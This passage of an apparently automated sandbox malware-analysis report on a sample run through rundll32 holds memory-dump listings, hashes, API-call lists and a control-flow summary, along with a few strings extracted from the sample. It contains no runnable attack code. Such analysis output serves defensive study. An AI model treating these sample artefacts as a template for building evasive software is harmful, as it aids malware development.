                    • Associated: 0000000E.00000002.4038213055.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038256944.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038290533.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038368692.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038400319.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038432274.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038468442.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038496338.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038524135.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$Leave$Enter
                    • String ID:
                    • API String ID: 2978645861-0
                    • Opcode ID: 81552ea04b8f0d4334cc7bdf6af72e2620360f65341830c32bae4a6db5f01a9f
                    • Instruction ID: 56c173e72efaabb3100106b86f381f207646cefe1b26b91f93a20514a2ca776e
                    • Opcode Fuzzy Hash: 81552ea04b8f0d4334cc7bdf6af72e2620360f65341830c32bae4a6db5f01a9f
                    • Instruction Fuzzy Hash: 39411D65210A5088DB10EF72D4913E92722EB84B9CF85A127FB4E87AA9DF7CC5C5C358
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 113 436960-436983 call 411140 GetFileAttributesW 116 436989-436991 113->116 117 436a4e-436a56 GetLastError 113->117 120 436993-43699d 116->120 121 4369a2-4369a4 116->121 118 436a79-436a7c 117->118 119 436a58-436a5b 117->119 122 436a81-436a8d 118->122 119->118 123 436a5d-436a63 119->123 120->122 124 4369a6-4369db CreateFileW 121->124 125 4369f8-4369fe 121->125 123->118 128 436a65-436a68 123->128 124->122 129 4369e1-4369f3 CloseHandle 124->129 126 436a00-436a03 125->126 127 436a05-436a3a call 420600 125->127 126->122 134 436a49-436a4c 127->134 135 436a3c-436a47 call 420550 127->135 128->118 131 436a6a-436a6d 128->131 129->122 131->118 133 436a6f-436a72 131->133 133->118 136 436a74-436a77 133->136 134->122 135->122 136->118 137 436a7e 136->137 137->122
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.4037022810.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000000E.00000002.4037004347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037022810.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037474252.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037500201.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037529369.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037549667.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037568860.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037591222.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037615513.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037636807.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037659731.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037684225.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037707043.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037729005.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037754010.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037779623.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037806316.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037826599.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037855236.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037889353.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037930304.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037961039.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037993144.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038014263.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038045735.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038075432.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038121994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038152677.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038180955.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038213055.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038256944.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038290533.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038368692.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038400319.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038432274.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038468442.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038496338.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038524135.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: File$AttributesCloseCreateErrorHandleLast
                    • String ID:
                    • API String ID: 2927643983-0
                    • Opcode ID: 45c71b4b7f66cbdff86984d3ecc73382b56bdf5e258aa0ca66effcb3267f1f5a
                    • Instruction ID: 98a77ccf81b0bcca3246d0e759f0e6111a319c85e2d8d3d3e5bdc5a1946655a4
                    • Opcode Fuzzy Hash: 45c71b4b7f66cbdff86984d3ecc73382b56bdf5e258aa0ca66effcb3267f1f5a
                    • Instruction Fuzzy Hash: BF216832B0821322E630B5A9A46475B1861578F7B8F2AF70FEC695B3D5CA7CCD81178D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetSystemDefaultUILanguage.KERNEL32 ref: 004154B7
                    Memory Dump Source
                    • Source File: 0000000E.00000002.4037022810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000000E.00000002.4037004347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037022810.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037474252.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037500201.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037529369.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037549667.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037568860.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037591222.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037615513.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037636807.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037659731.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037684225.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037707043.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037729005.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037754010.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037779623.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037806316.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037826599.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037855236.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037889353.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037930304.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037961039.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037993144.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038014263.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038045735.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038075432.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038121994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038152677.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038180955.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038213055.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038256944.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038290533.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038368692.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038400319.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038432274.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038468442.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038496338.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038524135.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: DefaultLanguageSystem
                    • String ID:
                    • API String ID: 4166810957-0
                    • Opcode ID: 97b19cd40701ddebf6783f0beb1e79e79877712c282ebd63ac355bdf4c4110e4
                    • Instruction ID: bb2f8fdc298b904da0d8311a6692b3c5818f4a7b9ef0247cd5b56ed5edd11b73
                    • Opcode Fuzzy Hash: 97b19cd40701ddebf6783f0beb1e79e79877712c282ebd63ac355bdf4c4110e4
                    • Instruction Fuzzy Hash: A651B576210B8089DB20EF76D8953D92762FB8479CF905427EA0D8BB59DF78C9C5C384
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetModuleFileNameW.KERNEL32 ref: 004155BB
                    Memory Dump Source
                    • Source File: 0000000E.00000002.4037022810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000000E.00000002.4037004347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037022810.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037474252.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037500201.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037529369.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037549667.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037568860.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037591222.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037615513.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037636807.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037659731.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037684225.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037707043.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037729005.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037754010.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037779623.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037806316.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037826599.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037855236.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037889353.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037930304.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037961039.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037993144.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038014263.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038045735.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038075432.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038121994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038152677.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038180955.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038213055.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038256944.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038290533.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038368692.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038400319.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038432274.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038468442.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038496338.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038524135.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: FileModuleName
                    • String ID:
                    • API String ID: 514040917-0
                    • Opcode ID: d11a0e43b40b78acf69311fe5df8e6df2ec459576eda087bd5762c40fa154f83
                    • Instruction ID: 501e22f373f49a8995146b0ee06b89f1180c0e2900e8ccb6f530d303bba059fa
                    • Opcode Fuzzy Hash: d11a0e43b40b78acf69311fe5df8e6df2ec459576eda087bd5762c40fa154f83
                    • Instruction Fuzzy Hash: 8B111532220A5098DB20EFB6C8957DA2765E7487CCF51202AFA4E47B99DF79C189C394
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • Sleep.KERNEL32 ref: 0080F91E
                      • Part of subcall function 00813C90: Sleep.KERNEL32 ref: 00813CAC
                      • Part of subcall function 00813C90: Sleep.KERNEL32 ref: 00813CC5
                    • Sleep.KERNEL32 ref: 0080F98C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.4037022810.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000000E.00000002.4037004347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037022810.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037474252.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037500201.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037529369.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037549667.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037568860.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037591222.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037615513.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037636807.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037659731.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037684225.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037707043.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037729005.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037754010.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037779623.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037806316.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037826599.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037855236.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037889353.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037930304.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037961039.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037993144.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038014263.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038045735.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038075432.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038121994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038152677.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038180955.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038213055.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038256944.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038290533.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038368692.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038400319.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038432274.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038468442.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038496338.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038524135.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID: .exe$0~$ClassicIE_64$Romania Knives$bucket1$bucket2$bucket3
                    • API String ID: 3472027048-4255013377
                    • Opcode ID: f255dd4eedc4a2de50590247ba1a38ad6c6e81a232c6d889f96da7bb08072170
                    • Instruction ID: 5d250b9ed75b9a8aaf0cfb9770c26032a61d01ab42eb7c904a683a03c819acb6
                    • Opcode Fuzzy Hash: f255dd4eedc4a2de50590247ba1a38ad6c6e81a232c6d889f96da7bb08072170
                    • Instruction Fuzzy Hash: B671CD76210B85D8DB60EF66D8A13D93325F78479CF809026EB4D4BB6ADF78C649C384
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040DFA0: GetCurrentThreadId.KERNEL32 ref: 0040DFA8
                    • GetTickCount.KERNEL32 ref: 0040D9A6
                    • GetTickCount.KERNEL32 ref: 0040D9BF
                    • GetCurrentThreadId.KERNEL32 ref: 0040D9F9
                    • GetTickCount.KERNEL32 ref: 0040DA2C
                    • GetTickCount.KERNEL32 ref: 0040DA65
                    • GetTickCount.KERNEL32 ref: 0040DA93
                    • GetCurrentThreadId.KERNEL32 ref: 0040DB03
                    Memory Dump Source
                    • Source File: 0000000E.00000002.4037022810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000000E.00000002.4037004347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037022810.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037474252.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037500201.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037529369.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037549667.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037568860.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037591222.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037615513.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037636807.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037659731.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037684225.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037707043.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037729005.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037754010.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037779623.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037806316.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037826599.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037855236.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037889353.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037930304.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037961039.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037993144.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038014263.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038045735.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038075432.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038121994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038152677.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038180955.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038213055.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038256944.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038290533.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038368692.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038400319.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038432274.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038468442.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
